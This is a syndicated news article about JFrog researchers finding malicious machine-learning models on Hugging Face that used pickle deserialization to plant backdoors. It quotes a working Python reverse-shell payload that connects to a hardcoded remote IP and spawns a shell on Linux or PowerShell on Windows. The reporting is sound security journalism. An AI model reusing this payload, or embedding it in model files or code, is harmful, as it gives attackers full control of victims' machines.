* . *
  • About
  • Advertise
  • Privacy & Policy
  • Contact
Tuesday, July 14, 2026
Earth-News
  • Home
  • Business
  • Entertainment
    Guggenheim raises Sphere Entertainment stock price target to $188 on venue outlook – Investing.com

    Guggenheim raises Sphere Entertainment stock price target to $188 on venue outlook – Investing.com

    Is a celebrity ‘sex pass’ ever a good idea? – news8000.com

    When Do Celebrity ‘Sex Passes’ Actually Work?

    Entertainment: Hop Over To Bastille Days – Urban Milwaukee

    Dive into the Excitement of Bastille Days in Milwaukee!

    July 11 Arts & Entertainment Highlights You Absolutely Can’t Miss

    Donald Iwerks, Disney Camera Technician and Co-Founder of Iwerks Entertainment, Dies at 96 – Variety

    Wes Anderson and Luke Wilson Rescued After Being Trapped in Elevator

  • General
  • Health
  • News

    Cracking the Code: Why China’s Economic Challenges Aren’t Shaking Markets, Unlike America’s” – Bloomberg

    Trump’s Narrow Window to Spread the Truth About Harris

    Trump’s Narrow Window to Spread the Truth About Harris

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Trending Tags

    • Trump Inauguration
    • United Stated
    • White House
    • Market Stories
    • Election Results
  • Science
  • Sports
  • Technology
    TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

    TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

    New 1st-in-Illinois technology available at OSF – WEEK | 25 News Now

    New 1st-in-Illinois technology available at OSF – WEEK | 25 News Now

    Goldman Sachs’ Insane SpaceX AI Forecast Has One Clear Winner: Micron Technology – 24/7 Wall St.

    Goldman Sachs’ Bold SpaceX AI Prediction Reveals One Clear Winner: Micron Technology

    Figure Technology Solutions (NASDAQ:FIGR) Cut to “Sell” at Wall Street Zen – MarketBeat

    Analysts Downgrade Figure Technology Solutions to “Sell” – What This Means for Investors

    Startup testing nuclear battery technology in orbit – SpaceNews

    Apple Launches Bold Legal Battle Against OpenAI in High-Stakes Showdown

    Trending Tags

    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • Mark Zuckerberg
No Result
View All Result
  • Home
  • Business
  • Entertainment
    Guggenheim raises Sphere Entertainment stock price target to $188 on venue outlook – Investing.com

    Guggenheim raises Sphere Entertainment stock price target to $188 on venue outlook – Investing.com

    Is a celebrity ‘sex pass’ ever a good idea? – news8000.com

    When Do Celebrity ‘Sex Passes’ Actually Work?

    Entertainment: Hop Over To Bastille Days – Urban Milwaukee

    Dive into the Excitement of Bastille Days in Milwaukee!

    July 11 Arts & Entertainment Highlights You Absolutely Can’t Miss

    Donald Iwerks, Disney Camera Technician and Co-Founder of Iwerks Entertainment, Dies at 96 – Variety

    Wes Anderson and Luke Wilson Rescued After Being Trapped in Elevator

  • General
  • Health
  • News

    Cracking the Code: Why China’s Economic Challenges Aren’t Shaking Markets, Unlike America’s” – Bloomberg

    Trump’s Narrow Window to Spread the Truth About Harris

    Trump’s Narrow Window to Spread the Truth About Harris

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Trending Tags

    • Trump Inauguration
    • United Stated
    • White House
    • Market Stories
    • Election Results
  • Science
  • Sports
  • Technology
    TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

    TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

    New 1st-in-Illinois technology available at OSF – WEEK | 25 News Now

    New 1st-in-Illinois technology available at OSF – WEEK | 25 News Now

    Goldman Sachs’ Insane SpaceX AI Forecast Has One Clear Winner: Micron Technology – 24/7 Wall St.

    Goldman Sachs’ Bold SpaceX AI Prediction Reveals One Clear Winner: Micron Technology

    Figure Technology Solutions (NASDAQ:FIGR) Cut to “Sell” at Wall Street Zen – MarketBeat

    Analysts Downgrade Figure Technology Solutions to “Sell” – What This Means for Investors

    Startup testing nuclear battery technology in orbit – SpaceNews

    Apple Launches Bold Legal Battle Against OpenAI in High-Stakes Showdown

    Trending Tags

    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • Mark Zuckerberg
No Result
View All Result
Earth-News
No Result
View All Result
Home Technology

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

March 3, 2024
in Technology
Hugging Face, the GitHub of AI, hosted code that backdoored user devices
Share on FacebookShare on Twitter

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Dan Goodin
– Mar 1, 2024 6:02 pm UTC

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST=”210.117.212.93″
RPORT=4242

from sys import platform

if platform !=’win32′:
import threading
import socket
import pty
import os

def connect_and_spawn_shell():
s=socket.socket()
s.connect((RHOST, RPORT))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn(“/bin/sh”)

threading.Thread(target=connect_and_spawn_shell).start()
else:
import os
import socket
import subprocess
import threading
import sys

def send_to_process(s, p):
while True:
p.stdin.write(s.recv(1024).decode())
p.stdin.flush()

def receive_from_process(s, p):
while True:
s.send(p.stdout.read(1).encode())

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

while True:
try:
s.connect((RHOST, RPORT))
break
except:
pass

p=subprocess.Popen([“powershell.exe”],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
shell=True,
text=True)

threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Page: 1 2 Next →

>>> Read full article>>>
Copyright for syndicated content belongs to the linked Source : Ars Technica – https://arstechnica.com/?p=2007291

Tags: GitHubHuggingtechnology
Previous Post

Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit

Next Post

Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4

Illinois prison healthcare still poor as state goes 1 year without long-term medical provider – NPR Illinois

Illinois Prison Healthcare Crisis Deepens Amid Year-Long Gap in Long-Term Medical Support

July 14, 2026
Tolling the Strait? NewsNight rolls the tape – CNN

Is Tolling the Strait the Next Big Move? An In-Depth Investigation

July 14, 2026
TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

TTM Technologies Arrives at the 2026 Farnborough International Airshow – Yahoo Finance

July 14, 2026
Chargers Daily Links: Tuesday Open Thread – Yahoo Sports

Chargers Chat: Tuesday Open Thread and Trending Hot Topics

July 14, 2026
Q&A with an Arctic Ecologist – NC State University

Exploring the Arctic: Fascinating Insights from an Ecologist’s Journey

July 14, 2026
Applications for new Doctor of Medical Science program at CU now open – Greater Fayetteville Business Journal

Unlock Your Future: Apply Now for the Exciting New Doctor of Medical Science Program!

July 14, 2026
Scientists discover how the brain rewires itself to truly multitask – ScienceDaily

How the Brain Rewires Itself to Master True Multitasking Revealed

July 14, 2026
Lifestyle shifts boost domestic outdoor sports biz – China Daily – Global Edition

Lifestyle Changes Ignite a Boom in the Domestic Outdoor Sports Industry

July 14, 2026
What are your most cherished memories of the 2026 World Cup in L.A.? – Los Angeles Times

Tell Us Your Most Cherished Memories from the 2026 World Cup in L.A.!

July 14, 2026
South Korea Turns More Bullish on Economy as Chip Boom Rolls On – Bloomberg.com

South Korea’s Economy Surges with Thriving Chip Boom Sparking New Optimism

July 14, 2026

Categories

Archives

July 2026
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  
« Jun    
Earth-News.info

The Earth News is an independent English-language daily published Website from all around the World News

Browse by Category

  • Business (20,088)
  • Ecology (1,312)
  • Economy (1,333)
  • Entertainment (22,164)
  • General (22,609)
  • Health (10,358)
  • Lifestyle (1,347)
  • News (22,105)
  • People (1,337)
  • Politics (1,355)
  • Science (16,528)
  • Sports (21,796)
  • Technology (16,294)
  • World (1,327)

Recent News

Illinois prison healthcare still poor as state goes 1 year without long-term medical provider – NPR Illinois

Illinois Prison Healthcare Crisis Deepens Amid Year-Long Gap in Long-Term Medical Support

July 14, 2026
Tolling the Strait? NewsNight rolls the tape – CNN

Is Tolling the Strait the Next Big Move? An In-Depth Investigation

July 14, 2026
  • About
  • Advertise
  • Privacy & Policy
  • Contact

© 2023 earth-news.info

No Result
View All Result

© 2023 earth-news.info

No Result
View All Result

© 2023 earth-news.info

Go to mobile version